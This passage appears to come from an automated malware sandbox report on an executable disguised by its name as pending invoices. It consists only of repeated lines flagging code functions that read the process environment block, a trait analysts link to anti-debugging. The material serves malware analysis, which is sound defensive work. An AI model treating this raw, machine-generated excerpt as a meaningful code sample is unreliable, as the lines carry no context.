      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1131 mov eax, dword ptr fs:[00000030h]3_2_324E1131
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1131 mov eax, dword ptr fs:[00000030h]3_2_324E1131
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251D1D0 mov eax, dword ptr fs:[00000030h]3_2_3251D1D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251D1D0 mov ecx, dword ptr fs:[00000030h]3_2_3251D1D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B51CB mov eax, dword ptr fs:[00000030h]3_2_325B51CB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325871F9 mov esi, dword ptr fs:[00000030h]3_2_325871F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E51ED mov eax, dword ptr fs:[00000030h]3_2_324E51ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B31E1 mov eax, dword ptr fs:[00000030h]3_2_325B31E1
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32537190 mov eax, dword ptr fs:[00000030h]3_2_32537190
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32595180 mov eax, dword ptr fs:[00000030h]3_2_32595180
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32595180 mov eax, dword ptr fs:[00000030h]3_2_32595180
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325911A4 mov eax, dword ptr fs:[00000030h]3_2_325911A4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325911A4 mov eax, dword ptr fs:[00000030h]3_2_325911A4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325911A4 mov eax, dword ptr fs:[00000030h]3_2_325911A4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325911A4 mov eax, dword ptr fs:[00000030h]3_2_325911A4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FB1B0 mov eax, dword ptr fs:[00000030h]3_2_324FB1B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32519660 mov eax, dword ptr fs:[00000030h]3_2_32519660
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32519660 mov eax, dword ptr fs:[00000030h]3_2_32519660
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3257D660 mov eax, dword ptr fs:[00000030h]3_2_3257D660
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251F603 mov eax, dword ptr fs:[00000030h]3_2_3251F603
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32511607 mov eax, dword ptr fs:[00000030h]3_2_32511607
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E3616 mov eax, dword ptr fs:[00000030h]3_2_324E3616
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E3616 mov eax, dword ptr fs:[00000030h]3_2_324E3616
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5636 mov eax, dword ptr fs:[00000030h]3_2_325B5636
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC mov eax, dword ptr fs:[00000030h]3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC mov eax, dword ptr fs:[00000030h]3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC mov eax, dword ptr fs:[00000030h]3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC mov eax, dword ptr fs:[00000030h]3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325116CF mov eax, dword ptr fs:[00000030h]3_2_325116CF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F6C7 mov eax, dword ptr fs:[00000030h]3_2_3259F6C7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259D6F0 mov eax, dword ptr fs:[00000030h]3_2_3259D6F0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D6E0 mov eax, dword ptr fs:[00000030h]3_2_3250D6E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D6E0 mov eax, dword ptr fs:[00000030h]3_2_3250D6E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325136EF mov eax, dword ptr fs:[00000030h]3_2_325136EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256368C mov eax, dword ptr fs:[00000030h]3_2_3256368C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256368C mov eax, dword ptr fs:[00000030h]3_2_3256368C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256368C mov eax, dword ptr fs:[00000030h]3_2_3256368C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256368C mov eax, dword ptr fs:[00000030h]3_2_3256368C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD6AA mov eax, dword ptr fs:[00000030h]3_2_324DD6AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD6AA mov eax, dword ptr fs:[00000030h]3_2_324DD6AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D76B2 mov eax, dword ptr fs:[00000030h]3_2_324D76B2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D76B2 mov eax, dword ptr fs:[00000030h]3_2_324D76B2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D76B2 mov eax, dword ptr fs:[00000030h]3_2_324D76B2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3740 mov eax, dword ptr fs:[00000030h]3_2_324F3740
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3740 mov eax, dword ptr fs:[00000030h]3_2_324F3740
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3740 mov eax, dword ptr fs:[00000030h]3_2_324F3740
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B3749 mov eax, dword ptr fs:[00000030h]3_2_325B3749
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB765 mov eax, dword ptr fs:[00000030h]3_2_324DB765
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB765 mov eax, dword ptr fs:[00000030h]3_2_324DB765
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB765 mov eax, dword ptr fs:[00000030h]3_2_324DB765
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB765 mov eax, dword ptr fs:[00000030h]3_2_324DB765
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E5702 mov eax, dword ptr fs:[00000030h]3_2_324E5702
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E5702 mov eax, dword ptr fs:[00000030h]3_2_324E5702
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E7703 mov eax, dword ptr fs:[00000030h]3_2_324E7703
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251F71F mov eax, dword ptr fs:[00000030h]3_2_3251F71F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251F71F mov eax, dword ptr fs:[00000030h]3_2_3251F71F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32515734 mov eax, dword ptr fs:[00000030h]3_2_32515734
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB73C mov eax, dword ptr fs:[00000030h]3_2_325BB73C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB73C mov eax, dword ptr fs:[00000030h]3_2_325BB73C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB73C mov eax, dword ptr fs:[00000030h]3_2_325BB73C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB73C mov eax, dword ptr fs:[00000030h]3_2_325BB73C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E3720 mov eax, dword ptr fs:[00000030h]3_2_324E3720
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FF720 mov eax, dword ptr fs:[00000030h]3_2_324FF720
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FF720 mov eax, dword ptr fs:[00000030h]3_2_324FF720
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FF720 mov eax, dword ptr fs:[00000030h]3_2_324FF720
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A972B mov eax, dword ptr fs:[00000030h]3_2_325A972B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E973A mov eax, dword ptr fs:[00000030h]3_2_324E973A
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E973A mov eax, dword ptr fs:[00000030h]3_2_324E973A
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F72E mov eax, dword ptr fs:[00000030h]3_2_3259F72E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9730 mov eax, dword ptr fs:[00000030h]3_2_324D9730
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9730 mov eax, dword ptr fs:[00000030h]3_2_324D9730
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E57C0 mov eax, dword ptr fs:[00000030h]3_2_324E57C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E57C0 mov eax, dword ptr fs:[00000030h]3_2_324E57C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E57C0 mov eax, dword ptr fs:[00000030h]3_2_324E57C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED7E0 mov ecx, dword ptr fs:[00000030h]3_2_324ED7E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F78A mov eax, dword ptr fs:[00000030h]3_2_3259F78A
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D7B0 mov eax, dword ptr fs:[00000030h]3_2_3250D7B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259D7B0 mov eax, dword ptr fs:[00000030h]3_2_3259D7B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259D7B0 mov eax, dword ptr fs:[00000030h]3_2_3259D7B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B37B6 mov eax, dword ptr fs:[00000030h]3_2_325B37B6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF7BA mov eax, dword ptr fs:[00000030h]3_2_324DF7BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF7BA mov eax, dword ptr fs:[00000030h]3_2_324DF7BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF7BA mov eax, dword ptr fs:[00000030h]3_2_324DF7BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF7BA mov eax, dword ptr fs:[00000030h]3_2_324DF7BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF7BA mov eax, dword ptr fs:[00000030h]3_2_324DF7BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF7BA mov eax, dword ptr fs:[00000030h]3_2_324DF7BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF7BA mov eax, dword ptr fs:[00000030h]3_2_324DF7BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF7BA mov eax, dword ptr fs:[00000030h]3_2_324DF7BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF7BA mov eax, dword ptr fs:[00000030h]3_2_324DF7BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256F7AF mov eax, dword ptr fs:[00000030h]3_2_3256F7AF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256F7AF mov eax, dword ptr fs:[00000030h]3_2_3256F7AF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256F7AF mov eax, dword ptr fs:[00000030h]3_2_3256F7AF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256F7AF mov eax, dword ptr fs:[00000030h]3_2_3256F7AF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256F7AF mov eax, dword ptr fs:[00000030h]3_2_3256F7AF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325697A9 mov eax, dword ptr fs:[00000030h]3_2_325697A9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258B450 mov eax, dword ptr fs:[00000030h]3_2_3258B450
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258B450 mov eax, dword ptr fs:[00000030h]3_2_3258B450
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258B450 mov eax, dword ptr fs:[00000030h]3_2_3258B450
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258B450 mov eax, dword ptr fs:[00000030h]3_2_3258B450
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F453 mov eax, dword ptr fs:[00000030h]3_2_3259F453
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB440 mov eax, dword ptr fs:[00000030h]3_2_324EB440
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB440 mov eax, dword ptr fs:[00000030h]3_2_324EB440
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB440 mov eax, dword ptr fs:[00000030h]3_2_324EB440
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB440 mov eax, dword ptr fs:[00000030h]3_2_324EB440
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB440 mov eax, dword ptr fs:[00000030h]3_2_324EB440
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB440 mov eax, dword ptr fs:[00000030h]3_2_324EB440
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B547F mov eax, dword ptr fs:[00000030h]3_2_325B547F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1460 mov eax, dword ptr fs:[00000030h]3_2_324E1460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1460 mov eax, dword ptr fs:[00000030h]3_2_324E1460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1460 mov eax, dword ptr fs:[00000030h]3_2_324E1460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1460 mov eax, dword ptr fs:[00000030h]3_2_324E1460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1460 mov eax, dword ptr fs:[00000030h]3_2_324E1460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FF460 mov eax, dword ptr fs:[00000030h]3_2_324FF460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FF460 mov eax, dword ptr fs:[00000030h]3_2_324FF460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FF460 mov eax, dword ptr fs:[00000030h]3_2_324FF460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FF460 mov eax, dword ptr fs:[00000030h]3_2_324FF460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FF460 mov eax, dword ptr fs:[00000030h]3_2_324FF460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FF460 mov eax, dword ptr fs:[00000030h]3_2_324FF460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32567410 mov eax, dword ptr fs:[00000030h]3_2_32567410
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250340D mov eax, dword ptr fs:[00000030h]3_2_3250340D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B54DB mov eax, dword ptr fs:[00000030h]3_2_325B54DB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B14F6 mov eax, dword ptr fs:[00000030h]3_2_325B14F6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B14F6 mov eax, dword ptr fs:[00000030h]3_2_325B14F6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325894E0 mov eax, dword ptr fs:[00000030h]3_2_325894E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E9486 mov eax, dword ptr fs:[00000030h]3_2_324E9486
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E9486 mov eax, dword ptr fs:[00000030h]3_2_324E9486
